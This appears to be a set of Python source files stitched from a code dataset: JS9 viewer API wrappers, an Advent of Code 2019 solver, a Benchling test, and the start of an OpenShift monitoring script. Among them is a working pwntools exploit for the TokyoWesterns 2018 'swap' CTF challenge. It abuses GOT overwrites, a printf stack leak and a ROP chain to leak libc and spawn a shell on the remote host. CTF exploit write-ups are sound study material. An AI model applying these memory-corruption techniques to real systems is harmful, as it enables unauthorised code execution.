    # serialize the command for the JS9 transport layer
    payload = {'cmd': 'AddRegions', 'args': args}
    return self.send(payload)
def GetRegions(self, *args):
    """
    Get information about one or more regions
    call:
    rarr = JS9.GetRegions(regions)
    where:
    - regions: which regions to retrieve (def: "selected" if there are
      selected regions, otherwise "all")
    returns:
    - rarr: array of region objects
    Each returned region object contains: id (numeric, auto-assigned),
    mode ('add', 'remove' or 'change'), shape, tags, color, x/y image
    coordinates, the shape-specific geometry (radii for annulus; width
    and height for box; radius for circle; r1/r2 for ellipse — misnomer
    noted; pts and points for polygons; angle for box and ellipse), and
    the coordinate strings wcsstr/wcssys plus imstr/imsys.
    """
    # query the back-end and return whatever it sends back
    message = dict(cmd='GetRegions', args=args)
    return self.send(message)
def ListRegions(self, *args):
    """
    List one or more regions
    call:
    JS9.ListRegions(regions, opts)
    where:
    - regions: which regions to list ("all", "selected", or any standard
      regions specification)
    - opts: object containing options
    By default a light window is displayed listing the regions, as if
    the list option of the Regions menu had been selected.
    The opts object supports the following properties:
    - mode: display/return mode: 1 (no display, return full string with
      json and comments), 2 (display and return shortened string), or
      3 (display and return full string)
    - wcssys: wcs system to use (ICRS, FK5, galactic, physical, etc.)
    - wcsunits: units for wcs output (sexagesimal, degrees, pixels)
    - includejson: include JSON object
    - includecomments: include comments
    - layer: which layer to display (def: regions layer)
    """
    # relay the listing request to JS9
    payload = {'cmd': 'ListRegions', 'args': args}
    return self.send(payload)
def ListGroups(self, *args):
    """
    List one or more region/shape groups
    call:
    JS9.ListGroups(group, opts)
    where:
    - group: groupid of the group to list, or "all" to list all groups
    - opts: object containing options
    Lists the specified region/shape group(s) in the specified layer.
    The optional opts object can contain:
    - includeregions: display regions as well as the group name (def: true)
    - layer: layer to list (def: "regions")
    For example:
    >>> j.ListGroups("all", {"includeregions": false})
    grp1
    grp2
    grp3
    >>> j.ListGroups("grp1")
    grp1:
    circle(3980.00,4120.00,20.00) # source,include,foo1
    ellipse(4090.00,4120.00,25.00,15.00,0.0000) # source,include,foo1
    """
    # forward to the JS9 back-end
    message = dict(cmd='ListGroups', args=args)
    return self.send(message)
def EditRegions(self, *args):
    """
    Edit one or more regions
    call:
    JS9.EditRegions()
    Edit one or more selected regions using an Edit dialog box. A single
    clicked region exposes all of its properties in the dialog; a group
    of regions selected via Meta-mousemove exposes shared properties
    (color, stroke width, dash pattern, tags). Use shift-click to add
    more regions to the edit group.
    """
    # no client-side work: just dispatch the command
    payload = {'cmd': 'EditRegions', 'args': args}
    return self.send(payload)
def ChangeRegions(self, *args):
    """
    Change one or more regions
    call:
    JS9.ChangeRegions(regions, opts)
    where:
    - regions: which regions to change (def: "selected" if there are
      selected regions, otherwise "all")
    - opts: object containing options to change in each region
    The opts object can contain the parameters described in the
    JS9.AddRegions() section; note that you cannot (yet) change the
    shape itself (e.g. from 'box' to 'circle'). See js9onchange.html
    for usage examples.
    The region selector can be any of: all, All (including child text
    regions), selected, [color], [shape], [wcs], [tag], /[regexp]/,
    child, parent.
    """
    # push the change request to JS9
    message = dict(cmd='ChangeRegions', args=args)
    return self.send(message)
def CopyRegions(self, *args):
    """
    Copy one or more regions to another image
    call:
    JS9.CopyRegions(to, regions)
    where:
    - to: image id to which to copy regions ("all" copies to all images)
    - regions: which regions to copy (def: "selected" if there are
      selected regions, otherwise "all")
    The region selector can be any of: all, All (including child text
    regions), selected, [color], [shape], [wcs], [tag], /[regexp]/,
    child, parent.
    """
    # dispatch the copy request to JS9
    payload = {'cmd': 'CopyRegions', 'args': args}
    return self.send(payload)
def RemoveRegions(self, *args):
    """
    Remove one or more regions from the region layer
    call:
    JS9.RemoveRegions(regions)
    where:
    - regions: which regions to remove (def: "selected" if there are
      selected regions, otherwise "all")
    The region selector can be any of: all, All (including child text
    regions), selected, [color], [shape], [wcs], [tag], /[regexp]/,
    child, parent.
    """
    # dispatch the removal request to JS9
    message = dict(cmd='RemoveRegions', args=args)
    return self.send(message)
def UnremoveRegions(self, *args):
    """
    Unremove one or more previously removed regions
    call:
    JS9.UnremoveRegions()
    If you accidentally remove one or more regions, you can restore
    them using this call. JS9 maintains a stack of removed regions (of
    size JS9.globalOpts.unremoveReg, current default is 100). Each
    time one or more regions is removed, they are stored as a single
    entry on this stack. The UnremoveRegions call pops the last entry
    off the stack and calls AddRegions.
    """
    # fix: docstring previously showed the wrong call, "JS9.RemoveRegions()"
    return self.send({'cmd': 'UnremoveRegions', 'args': args})
def SaveRegions(self, *args):
    """
    Save regions from the current image to a file
    call:
    JS9.SaveRegions(filename, which, layer)
    where:
    - filename: output file name (def: "js9.reg")
    - which: which regions to save (def: "all"; "selected" or a tag
      value may also be given)
    - layer: which layer to save (def: "regions"; another shape layer,
      e.g. a catalog layer, can be saved in region format here, since
      SaveCatalog() saves table data instead of regions)
    The file is saved by the browser, in whatever location you have set
    up for downloads.
    """
    # forward the save request to JS9
    payload = {'cmd': 'SaveRegions', 'args': args}
    return self.send(payload)
def SelectRegions(self, *args):
    """
    Group regions into a selection
    call:
    JS9.SelectRegions(regions)
    where:
    - regions: which regions to select (def: "all")
    Programmatic equivalent of dragging the mouse over regions: makes a
    selection of the matching regions, which can be moved as one unit.
    For example:
    >>> j.SelectRegions("circle")            # select all circles
    >>> j.SelectRegions("circle && !foo2")   # circles without tag 'foo2'
    Regions in a selection are still matched individually by region
    selectors; use the selected specification to process only the
    regions inside the selection.
    """
    # dispatch the selection request to JS9
    message = dict(cmd='SelectRegions', args=args)
    return self.send(message)
def UnselectRegions(self, *args):
    """
    Remove regions from a selection
    call:
    JS9.UnselectRegions(regions)
    where:
    - regions: which regions to unselect
    If regions is unspecified, "all", or "selected", the current
    selection is undone. Otherwise a new selection is made that omits
    the specified regions, and that selection can be moved as one unit.
    For example:
    >>> j.UnselectRegions("circle&&!foo2")  # unselect circles w/o tag 'foo2'
    """
    # dispatch the unselect request to JS9
    payload = {'cmd': 'UnselectRegions', 'args': args}
    return self.send(payload)
def GroupRegions(self, *args):
    """
    Gather regions into a long-lived group
    call:
    JS9.GroupRegions(regions, opts)
    where:
    - regions: which regions to group (def: 'selected' if a selection
      exists, otherwise 'all')
    - opts: optional object containing grouping options
    returns:
    - groupid: the group id associated with the newly created group
    A region group can be moved and resized as a single unit; unlike a
    temporary selection (dissolved by clicking outside it), a group is
    dissolved only by calling JS9.UngroupRegions().
    The optional opts argument contains the following properties:
    - groupid: the group id to use, if possible (default: 'group_[n]';
      an integer is appended if the id is already taken)
    - select: if false, the group is not selected upon creation
    The returned groupid string can be used to select and process all
    the regions in that group:
    >>> gid = j.GroupRegions('circle && foo1');
    >>> j.ChangeRegions(gid, {'color':'red'});
    When creating a regions file via JS9.SaveRegions(), the groupid is
    stored in each grouped region's JSON object and is used to
    reconstitute the group when the file is reloaded.
    Note that regions in a group are not matched by non-groupid region
    selectors:
    >>> j.ChangeRegions('circle', {'color':'cyan'}) # won't change group
    >>> j.ChangeRegions(gid, {'color':'red'});      # changes group
    A region can belong to only one group at a time; the
    globalOpts.regGroupConflict property ('skip' by default, or 'error')
    controls how an already-grouped region is handled.
    """
    # fix: docstring header previously read "GroupRegions(shapes, opts)"
    # while the parameter list described "regions"; normalized to regions.
    return self.send({'cmd': 'GroupRegions', 'args': args})
def UngroupRegions(self, *args):
    """
    Dissolve a group of regions
    call:
    JS9.UngroupRegions(groupid, opts)
    where:
    - groupid: group id of the group to dissolve (as returned by
      JS9.GroupRegions())
    - opts: optional object containing ungrouping options
    The optional opts argument supports:
    - select: if true, the newly separate regions are 'selected'
      (e.g. so they can be removed with the Delete key)
    For example:
    >>> gid = j.GroupRegions('circle || ellipse')
    >>> j.UngroupRegions(gid)
    """
    # dispatch the ungroup request to JS9
    message = dict(cmd='UngroupRegions', args=args)
    return self.send(message)
def ChangeRegionTags(self, *args):
    """
    Change region tags for the specified image(s)
    call:
    JS9.ChangeRegionTags(which, addreg, removereg)
    where:
    - which: which regions to process (def: 'all')
    - addreg: array or comma-delimited string of tags to add
    - removereg: array or comma-delimited string of tags to remove
    Unlike JS9.ChangeRegions(), which replaces tags wholesale, this
    routine adds and/or removes specific tags:
    >>> JS9.ChangeRegionTags('selected', ['foo1', 'foo2'], ['goo1']);
    >>> JS9.ChangeRegionTags('selected', 'foo1,foo2', 'goo1');
    """
    # dispatch the tag update to JS9
    payload = {'cmd': 'ChangeRegionTags', 'args': args}
    return self.send(payload)
def ToggleRegionTags(self, *args):
    """
    Toggle two region tags for the specified image(s)
    call:
    JS9.ToggleRegionTags(which, tag1, tag2)
    where:
    - which: which regions to process (def: 'all')
    - tag1: tag #1 to toggle
    - tag2: tag #2 to toggle
    Unlike JS9.ChangeRegions(), which replaces tags wholesale, this
    routine toggles between two tags, e.g., a source region and
    background region, or include and exclude. For example:
    >>> JS9.ToggleRegionTags('selected', 'source', 'background');
    will change a background region into a source region or vice-versa,
    depending on the state of the region, while:
    >>> JS9.ToggleRegionTags('selected', 'include', 'exclude');
    will toggle between include and exclude.
    """
    # fix: docstring previously showed the miscased call "JS9.toggleRegionTags"
    return self.send({'cmd': 'ToggleRegionTags', 'args': args})
def LoadRegions(self, *args):
    """
    Load regions from a file into the current image
    call:
    JS9.LoadRegions(filename)
    where:
    - filename: input file name or URL (required); a local file may use
      an absolute path or a path relative to the displayed web page
    """
    # dispatch the load request to JS9
    message = dict(cmd='LoadRegions', args=args)
    return self.send(message)
def LoadCatalog(self, *args):
    """
    Load an astronomical catalog
    call:
    JS9.LoadCatalog(layer, table, opts)
    where:
    - layer: name of the shape layer into which to load the catalog
      (an existing layer is valid: its previous shapes are removed)
    - table: string or blob containing the catalog table
    - opts: catalog options
    Astronomical catalogs are a special type of shape layer generated
    from a tab-delimited text file of columns, two of which contain RA
    and Dec values; a pre-amble of comments is skipped (by default lines
    whose first column is '#'). The RA/Dec values are converted into
    image positions displayed as shapes in a new catalog layer.
    The opts object may specify (defaults live in
    JS9.globalOpts.catalogs and can be changed in the Catalog tab of
    the Preferences plugin):
    - xcol, ycol: names of the RA and Dec columns in the table
    - wcssys: wcs system (FK4, FK5, ICRS, galactic, ecliptic)
    - shape, color: shape and color of catalog objects
    - width, height (box); radius (circle); r1, r2 (ellipse)
    - tooltip: format of tooltip string to display for each object
    - skip: comment character in table file
    """
    # dispatch the catalog data to JS9
    payload = {'cmd': 'LoadCatalog', 'args': args}
    return self.send(payload)
def SaveCatalog(self, *args):
    """
    Save an astronomical catalog to a file
    call:
    JS9.SaveCatalog(filename, which)
    where:
    - filename: output file name (def: [layer].cat)
    - which: layer containing catalog objects to save (def: the current
      active layer)
    The layer to save must be a catalog created from a tab-delimited
    file (or URL) of catalog objects (e.g., not the regions layer).
    The file is saved by the browser, in whatever location you have set
    up for downloads.
    """
    # dispatch the save request to JS9
    message = dict(cmd='SaveCatalog', args=args)
    return self.send(message)
def GetAnalysis(self, *args):
    """
    Get server-side analysis task definitions
    call:
    JS9.GetAnalysis()
    Returns an array of analysis task definitions, each containing:
    - name: a short identifier string (typically one word)
    - title: a longer string displayed in the Analysis menu
    - files: a rule matched against the current image to determine
      whether this task is available for it
    - purl: a URL pointing to a web page containing a user parameter
      form (present only when there is a parameter form)
    - action: the command to execute on the server side
    - rtype: return type: text, plot, fits, png, regions, catalog,
      alert, none
    - hidden: if true, the task is not shown in the Analysis menu
    Not every property is present in every task definition, and hidden
    tasks are not returned by this call.
    """
    # query the back-end for the task list
    payload = {'cmd': 'GetAnalysis', 'args': args}
    return self.send(payload)
def RunAnalysis(self, *args):
    """
    Run a simple server-side analysis task
    call:
    JS9.RunAnalysis(name, parr)
    where:
    - name: name of analysis tool
    - parr: optional array of macro-expansion options for command line,
      in jQuery name/value serialized object format
      (http://api.jquery.com/serializeArray/)
    Executes a server-side analysis task and returns the results for
    further processing within Python.
    NB: Prior to JS9 v1.10, this routine displayed the results on the
    JS9 web page instead of returning them to Python. To display the
    results in JS9, use the "analysis" short-cut routine instead.
    """
    # dispatch the analysis request to JS9
    message = dict(cmd='RunAnalysis', args=args)
    return self.send(message)
def SavePNG(self, *args):
    """
    Save image as a PNG file
    call:
    JS9.SavePNG(filename, opts)
    where:
    - filename: output file name (def: "js9.png")
    - opts: optional save parameters
    The opts object can specify the following properties:
    - layers: save graphical layers (e.g. regions) (def: true); set to
      false to save only the image
    - source: "image" or "display" (def: "display")
    By default the RGB pixels come from the display, so a blended set
    of images saves the blended pixels. To save the RGB pixels of one
    image in a blend, set source to "image" and give the image's id in
    the display parameter, e.g. in the js9blend.html demo:
    >>> SavePNG("foo.png", {"source":"image"}, {"display":"chandra.fits"});
    The file is saved by the browser, in whatever location you have set
    up for downloads.
    """
    # dispatch the save request to JS9
    payload = {'cmd': 'SavePNG', 'args': args}
    return self.send(payload)
def SaveJPEG(self, *args):
    """
    Save image as a JPEG file
    call:
    JS9.SaveJPEG(filename, opts)
    where:
    - filename: output file name
    - opts: optional save parameters or a number between 0 and 1
      indicating image quality
    The opts object can specify the following properties:
    - layers: save graphical layers (e.g. regions) (def: true); set to
      false to save only the image
    - source: "image" or "display" (def: "display")
    - quality: JPEG encoder quality; if unspecified, a suitable default
      is used (on FireFox, at least, this default is 0.95)
    By default the RGB pixels come from the display, so a blended set
    of images saves the blended pixels. To save the RGB pixels of one
    image in a blend, set source to "image" and give the image's id in
    the display parameter, e.g. in the js9blend.html demo:
    >>> SaveJPEG("foo.jpg", {"source":"image"}, {"display":"chandra.fits"});
    If filename is not specified, a default JPEG filename is used
    (NOTE(review): previous doc said "js9.png", which looks like a
    copy-paste from SavePNG — confirm the actual default against JS9).
    The file is saved by the browser, in whatever location you have set
    up for downloads.
    """
    # fix: docstring previously claimed a ".png" default filename and used
    # a ".png" example filename for a JPEG save.
    return self.send({'cmd': 'SaveJPEG', 'args': args})
def GetToolbar(self, *args):
    """
    Get toolbar values from the Toolbar plugin
    call:
    val = GetToolbar(type)
    where:
    - type: type of information to retrieve
    returns:
    - val: array of tool objects (or an argument-dependent return)
    Returns global information about the Toolbar plugin. If the first
    argument is "showTooltips", the returned value specifies whether
    tooltips are currently displayed; otherwise an array of tool
    objects is returned, one for each defined tool in the toolbar.
    """
    # query the Toolbar plugin through the JS9 transport
    message = dict(cmd='GetToolbar', args=args)
    return self.send(message)
def SetToolbar(self, *args):
    """Set toolbar values / add tools to the Toolbar plugin.

    The first argument selects the action: "init" re-initializes all
    display toolbars, "showTooltips" plus a boolean toggles tooltips,
    JSON text / an object / an array adds new tool definitions. Tool
    objects require `name` and `cmd`; `tip`, `image` and `args` are
    optional. After editing JS9.globalOpts.toolBar, re-run
    SetToolbar("init") to refresh active toolbars.
    """
    return self.send(dict(cmd="SetToolbar", args=args))
def UploadFITSFile(self, *args):
    """Upload the displayed FITS file to the proxy server for back-end
    analysis. Requires a Node.js JS9 helper with the loadProxy property
    enabled and a workDir directory configured.
    """
    return self.send(dict(cmd="UploadFITSFile", args=args))
def GetFITSHeader(self, *args):
    """Return the FITS header as a string.

    By default the 80-character cards are concatenated; pass a truthy
    nlflag to append a newline to each card. (GetImageData() returns the
    header as an object instead, without the per-card comments.)
    """
    return self.send(dict(cmd="GetFITSHeader", args=args))
def Print(self, *args):
    """Print the current image."""
    return self.send(dict(cmd="Print", args=args))
def DisplayNextImage(self, *args):
    """Display the n-th image after the current one in the display's
    image list (default n=1); a negative n steps backwards.
    """
    return self.send(dict(cmd="DisplayNextImage", args=args))
def CreateMosaic(self, *args):
    """Create a mosaic from previously loaded FITS images.

    Uses the Montage mProjectPP/mAdd programs (compiled into JS9 with
    Emscripten); images must have tangent-plane-like WCS projections
    (TAN, SIN, ZEA, STG, ARC). `which` selects the inputs: "current" or
    None (this display's current image), "all" (all images in this
    display), an image id, or a list of image ids. `opts` may contain
    `dim` (target mosaic size), `reduce` ("js9" or "shrink") and
    `verbose`. The mosaic loads into the display as a separate image.
    """
    return self.send(dict(cmd="CreateMosaic", args=args))
def ResizeDisplay(self, *args):
    """Change the JS9 display's width and height (HTML pixels).

    The image is re-centered in the resized div. `opts.resizeMenubar`
    (default True) controls whether the menubar width changes too.
    """
    return self.send(dict(cmd="ResizeDisplay", args=args))
def GatherDisplay(self, *args):
    """Move all (or `opts.images`-selected) images from other displays
    into the display named `dname`.
    """
    return self.send(dict(cmd="GatherDisplay", args=args))
def SeparateDisplay(self, *args):
    """Move each image in display `dname` into its own new display.

    `opts` may contain `images` (subset to separate), `layout`
    ("horizontal", "vertical" or the default "auto"), `leftMargin` and
    `topMargin` (pixel gaps between separated images).
    """
    return self.send(dict(cmd="SeparateDisplay", args=args))
def CenterDisplay(self, *args):
    """Scroll the named JS9 display to the center of the viewport."""
    return self.send(dict(cmd="CenterDisplay", args=args))
def CloseDisplay(self, *args):
    """Close all images in the JS9 display named `dname`."""
    return self.send(dict(cmd="CloseDisplay", args=args))
def RenameDisplay(self, *args):
    """Rename the id of a JS9 display.

    Call with (nid) to rename the default display, or (oid, nid) to
    rename a specific one. External clients (js9 script, pyjs9) must
    then target the new id; the original id remains usable from
    JavaScript on the page via the {display: "id"} syntax.
    """
    return self.send(dict(cmd="RenameDisplay", args=args))
def RemoveDisplay(self, *args):
    """Close all images in display `dname` and remove the display.

    Works for displays in light windows (closed without confirmation)
    and in JS9 Grid Containers (removed from the DOM; at least one
    display must remain in a container).
    """
    return self.send(dict(cmd="RemoveDisplay", args=args))
def DisplayHelp(self, *args):
    """Show a help page in a light window.

    `name` is either a property name from JS9.helpOpts (e.g. "user",
    "install") or an arbitrary URL to display.
    """
    return self.send(dict(cmd="DisplayHelp", args=args))
def LightWindow(self, *args):
    """Display arbitrary content in a Dynamic Drive light window.

    Arguments: id (default "lightWindow" + uniqueID), type ("inline",
    "div", "ajax" or "iframe"; default "inline"), content (HTML, div id,
    relative page path, or URL depending on type), title, and an opts
    configuration string such as
    "width=830px,height=400px,center=1,resize=1,scrolling=1".
    JS9 adds double-click-on-title-bar to close the window.
    """
    return self.send(dict(cmd="LightWindow", args=args))
def analysis(self, *args):
    """Command-style: run/list analysis for the current image.

    No arguments lists; arguments run. Returns a string.
    """
    return self.send(dict(cmd="analysis", args=args))
def colormap(self, *args):
    """Command-style: set/get the current image's colormap.

    Getter (no args) returns the string 'colormap contrast bias'.
    """
    return self.send(dict(cmd="colormap", args=args))
def cmap(self, *args):
    """Command-style alias of colormap(): set/get the colormap.

    Getter (no args) returns the string 'colormap contrast bias'.
    """
    return self.send(dict(cmd="cmap", args=args))
def colormaps(self, *args):
    """Get the available colormaps as a string like 'grey, red, ...'.
    There is no setter.
    """
    return self.send(dict(cmd="colormaps", args=args))
def helper(self, *args):
    """Get information about the JS9 helper."""
    return self.send(dict(cmd="helper", args=args))
def image(self, *args):
    """Command-style: get the current image's name, or display the
    specified image. Returns a string.
    """
    return self.send(dict(cmd="image", args=args))
def images(self, *args):
    """Get the list of currently loaded images (string). No setter."""
    return self.send(dict(cmd="images", args=args))
def load(self, *args):
    """Load image(s). No getter is provided."""
    return self.send(dict(cmd="load", args=args))
def pan(self, *args):
    """Command-style: set/get the pan location of the current image.

    Getter (no args) returns the string 'x y'.
    """
    return self.send(dict(cmd="pan", args=args))
def regcnts(self, *args):
    """Command-style: background-subtracted counts in regions.

    With no arguments behaves like the Analysis menu option; with
    arguments returns a string result.
    """
    return self.send(dict(cmd="regcnts", args=args))
def region(self, *args):
    """Command-style alias of regions(): add a region to the current
    image or list all regions. Returns a string.
    """
    return self.send(dict(cmd="region", args=args))
def regions(self, *args):
    """Command-style: add a region to the current image or list all
    regions. Returns a string.
    """
    return self.send(dict(cmd="regions", args=args))
def resize(self, *args):
    """Command-style: set/get the JS9 display size.

    Getter (no args) returns the string 'width height'.
    """
    return self.send(dict(cmd="resize", args=args))
def scale(self, *args):
    """Command-style: set/get the current image's scaling.

    Getter (no args) returns the string 'scale scalemin scalemax'.
    """
    return self.send(dict(cmd="scale", args=args))
def scales(self, *args):
    """Get the available scales as a string like 'linear, log, ...'.
    There is no setter.
    """
    return self.send(dict(cmd="scales", args=args))
def wcssys(self, *args):
    """Command-style: set/get the current image's WCS system (string)."""
    return self.send(dict(cmd="wcssys", args=args))
def wcsu(self, *args):
    """Command-style: set/get the WCS units used for the current image
    (string).
    """
    return self.send(dict(cmd="wcsu", args=args))
def wcssystems(self, *args):
    """Get the available WCS systems as a string like 'FK4, FK5, ...'.
    There is no setter.
    """
    return self.send(dict(cmd="wcssystems", args=args))
def wcsunits(self, *args):
    """Get the available WCS units as a string like 'degrees, ...'.
    There is no setter.
    """
    return self.send(dict(cmd="wcsunits", args=args))
def zoom(self, *args):
    """Command-style: set/get the current image's zoom.

    Getter (no args) returns an integer or float.
    """
    return self.send(dict(cmd="zoom", args=args))
| 2.34375 | 2 |
def pcnt(N, p):
    """Return the integer part of the fraction *p* of *N*."""
    return int(N * p)
2019/day-14/part12.py | amochtar/adventofcode | 1 | 12765012 | #!/usr/bin/env python
from collections import defaultdict
from math import ceil
def solve(input):
    """Advent of Code 2019 day 14: nanofactory fuel production.

    Parses reaction lines of the form "7 A, 1 B => 1 C", prints the ORE
    cost of producing one FUEL, then binary-searches and prints the
    largest amount of FUEL producible from one trillion ORE.

    :param input: iterable of reaction strings
    """
    def element(spec):
        # "7 A" -> ("A", 7)
        amount, name = spec.split()
        return (name, int(amount))

    def nxt(needs):
        # First non-ORE element still owed; None when only ORE remains.
        for name, amount in needs.items():
            if name != 'ORE' and amount > 0:
                return (name, amount)

    def ore_needed(fuel):
        # Expand the FUEL requirement down to raw ORE, running whole
        # reaction batches (surplus shows up as negative need).
        needs = defaultdict(int)
        needs['FUEL'] = fuel
        while pending := nxt(needs):
            name, amount = pending
            produced, inputs = reactions[name]
            # Exact integer ceiling division: ceil(amount / produced)
            # without the float round-off risk of math.ceil at the very
            # large quantities part 2 produces.
            batches = -(-amount // produced)
            needs[name] -= batches * produced
            for in_name, in_amount in inputs:
                needs[in_name] += batches * in_amount
        return needs['ORE']

    # reactions: output element -> (amount produced per batch, inputs)
    reactions = {}
    for line in input:
        lhs, rhs = line.split(' => ')
        name, produced = element(rhs)
        reactions[name] = (produced, [element(part) for part in lhs.split(', ')])

    # Part 1: ORE for a single FUEL.
    ore_for_one = ore_needed(1)
    print(ore_for_one)

    # Part 2: binary search the maximum FUEL from 1e12 ORE. budget//cost
    # is a guaranteed lower bound; surplus reuse keeps the answer < 2x it.
    budget = 1000000000000
    low = budget // ore_for_one
    high = low * 2
    max_fuel = 0
    while low < high:
        fuel = (low + high + 1) // 2
        if ore_needed(fuel) <= budget:
            max_fuel = max(fuel, max_fuel)
            low = fuel
        else:
            high = fuel - 1
    print(max_fuel)
# with open('test.txt', 'r') as f:
# input = f.read().splitlines()
# solve(input)
if __name__ == "__main__":
    # Guarded entry point: run the solver on the puzzle input only when
    # executed as a script, so importing this module has no side effects.
    with open('input.txt', 'r') as f:
        input = f.read().splitlines()
    solve(input)
| 3.28125 | 3 |
tests/test_models/test_dna_sequence.py | klavinslab/benchling-api | 36 | 12765013 | import pytest
def test_web_link(session):
    """Round-trip check: a sequence fetched through its own share link
    must keep the same id as the original.
    """
    for sequence in session.DNASequence.last(10):
        reloaded = session.DNASequence.from_share_link(sequence.web_url)
        assert reloaded.id == sequence.id
# def test_share_link(session):
#
# # dna = session.DNASequence.from_share_link('https://benchling.com/s/seq-YR1KBSvPlZ8sGOlnOBqe')
# # assert dna
# dna = session.DNASequence.one()
# print(session.DNASequence.find(dna.id))
# print(session.DNASequence.find('seq_Kzxlbux9'))
#
# # print(session.Folder.find('lib_SjLcTsG4'))
#
# folder = session.Folder.find_by_name('APITrash')
# print(folder)
# print(folder.id)
# print(session.Folder.find(folder.id))
| 2.21875 | 2 |
ctf/TokyoWesterns18/swap/exploit.py | lordidiot/lordidiot.github.io | 1 | 12765014 | #!/usr/bin/python
from pwn import *
import sys
#sys.path.append('/home/lord_idiot/CTF-Tools/python-libs')
# Remote CTF service coordinates.
HOST = "swap.chal.ctf.westerns.tokyo"
PORT = 37567
# Mutable exploit state shared between the helpers below.
prev = None  # address currently staged in the byte-scratch cell
stack_leak = None  # leaked stack address, filled in by exploit()
stopRecv = False  # when True, send blindly instead of waiting for prompts
def sett(a, b):
    """Send menu option 1 ("set") with the two addresses *a* and *b*.

    When the global stopRecv flag is on, the prompts are not consumed
    (the remote service is too slow to echo every one), so everything is
    written blindly.
    """
    global stopRecv
    if stopRecv:
        for payload in ("1", str(a), str(b)):
            r.sendline(payload)
    else:
        r.sendlineafter("Your choice: \n", "1")
        r.sendlineafter("1st address: \n", str(a))
        r.sendlineafter("2nd address: \n", str(b))
def swap():
    """Send menu option 2 ("swap"); blind when stopRecv is set."""
    global stopRecv
    if stopRecv:
        r.sendline("2")
    else:
        r.sendlineafter("Your choice: \n", "2")
def lowestByte(dest, byte, secondRound=False):
    """Place one byte value at *dest* using only the swap primitive.

    NOTE(review): stages via the fixed cell 0x601200+byte and a stack
    gadget; the 0x32/0x4a/0x142 offsets are specific to this binary's
    stack layout -- presumably recovered in a debugger, confirm there.
    """
    global prev
    global stack_leak
    # Second-round writes use a different stack scratch slot.
    if secondRound:
        addr2 = stack_leak+0x4a
    else:
        addr2 = stack_leak+0x32
    gadget = stack_leak+0x142
    # Rotate the previously staged cell out, stage the new byte cell...
    sett(prev, 0x601200+byte)
    swap()
    sett(addr2, 0x601200+byte)
    swap()
    # ...then swap the gadget's value into the destination.
    sett(gadget, dest)
    swap()
    # Remember which staging cell holds state for the next call.
    prev = 0x601200+byte
    return
def write(addr, value, secondRound=False):
    """Write an arbitrary 8-byte *value* to *addr*, one byte at a time."""
    global prev
    print "Writing 0x{:x} to 0x{:x}".format(value, addr)
    for i in xrange(8):
        # Extract bytes most-significant first.
        val = value >> 8*(7-i) & 0xff
        lowestByte(0x601310, val, secondRound)
        # NOTE(review): each swap shifts the byte into the assembly
        # buffer around 0x601400, then exchanges it with *addr*.
        sett(0x601310-7, 0x601400-i)
        swap()
        sett(addr, 0x601400)
        swap()
def exploit(r):
    """Full exploit: leak a stack address via printf, build a ROP chain
    with the swap-based arbitrary write, leak libc, then jump to a
    one-gadget for a shell.

    NOTE(review): all hard-coded addresses (GOT slots, gadgets, the
    0x56510 printf offset and 0xf24cb one-gadget) are binary/libc
    specific -- verify against the exact challenge binaries.
    """
    global prev
    global stack_leak
    global stopRecv
    # GOT entries of the target binary (no PIE assumed).
    GOT_exit = 0x601018
    GOT_puts = 0x601028
    GOT_stkfail = 0x601030
    GOT_printf = 0x601038
    GOT_setvbuff = 0x601048
    GOT_atoi = 0x601050
    # allow printf to be called once
    r.sendlineafter("Your choice: \n", "0")
    # leak with swap atoi printf: menu input now goes through printf,
    # so "%p" prints a stack pointer.
    sett(GOT_printf, GOT_atoi)
    swap()
    r.sendafter("Your choice: \n", "%p")
    stack_leak = int(r.recvn(14), 16)
    addr1 = stack_leak+0x2a
    addr2 = stack_leak+0x32
    log.info("stack_leak : 0x{:x}".format(stack_leak))
    # swap back
    r.sendafter("Your choice: \n", "aa")
    # NEED THIS BECAUSE TOO SLOW IN REMOTE
    stopRecv = True
    # arbitrary write ROP chain
    prev = stack_leak+0xd2
    # Redirect exit() so menu option 3 pivots into our chain.
    write(GOT_exit, 0x400a46)
    PLT_read = 0x4006d0
    rdi = 0x0000000000400a53
    rsip = 0x0000000000400a51
    ROP = []
    #leak
    ROP.append(rdi)
    ROP.append(GOT_printf)
    ROP.append(0x4006a0) #PLT_puts
    ROP.append(0x0000000004008E9) #main
    rop_start = stack_leak+0x4a
    for gadget in ROP:
        write(rop_start, gadget)
        rop_start += 8
    # Trigger the chain (menu option 3 -> hijacked exit).
    r.sendline("3")
    r.recvuntil("Bye. ")
    # puts(GOT_printf) leaked libc's printf address.
    LIBC_printf = u64(r.recvline().strip("\n").ljust(8, "\x00"))
    LIBC_base = LIBC_printf - 0x56510
    log.info("LIBC_base : 0x{:x}".format(LIBC_base))
    ####### SECOND ROUND #############
    # Point exit() at a libc one-gadget and satisfy its constraint.
    write(GOT_exit, LIBC_base+0xf24cb, True)
    write(stack_leak+0x8a, 0, True)
    r.sendline("3")
    r.interactive()
    return
if __name__ == "__main__":
    elf_name = "./swap_returns"
    e = ELF(elf_name)
    libc_name = "./libc.so.6"
    #libc = ELF(libc_name)
    if sys.argv[-1] == "remote":
        # Attack the live CTF service.
        r = remote(HOST, PORT)
        exploit(r)
    else:
        # Local run: preload the challenge libc when one is provided.
        if libc_name != "":
            r = process(elf_name, env={"LD_PRELOAD" : libc_name})
        else:
            r = process(elf_name)
        print util.proc.pidof(r)
        # "debug" argument pauses so a debugger can attach first.
        if sys.argv[-1] == "debug":
            pause()
        exploit(r)
scripts/monitoring/cron-send-usage-pv.py | north-team/openshift-tools | 0 | 12765015 | <reponame>north-team/openshift-tools
#!/usr/bin/env python
""" Report the usage of the pv """
# We just want to see any exception that happens
# don't want the script to die under any cicumstances
# script must try to clean itself up
# pylint: disable=broad-except
# main() function has a lot of setup and error handling
# pylint: disable=too-many-statements
# main() function raises a captured exception if there is one
# pylint: disable=raising-bad-type
# Adding the ignore because it does not like the naming of the script
# to be different than the class name
# pylint: disable=invalid-name
import argparse
import datetime
import logging
import time
import re
# Our jenkins server does not include these rpms.
# In the future we might move this to a container where these
# libs might exist
#pylint: disable=import-error
#pylint: disable=maybe-no-member
from openshift_tools.monitoring.ocutil import OCUtil
from openshift_tools.monitoring.metric_sender import MetricSender
# Module-level logging: timestamped format on the root logger; INFO by
# default (main() raises it to DEBUG when --verbose is passed).
logging.basicConfig(
    format='%(asctime)s - %(relativeCreated)6d - %(levelname)-8s - %(message)s',
)
logger = logging.getLogger()
logger.setLevel(logging.INFO)

# Shared client for running `oc` commands; its namespace is set in main().
ocutil = OCUtil()
def runOCcmd(cmd, base_cmd='oc'):
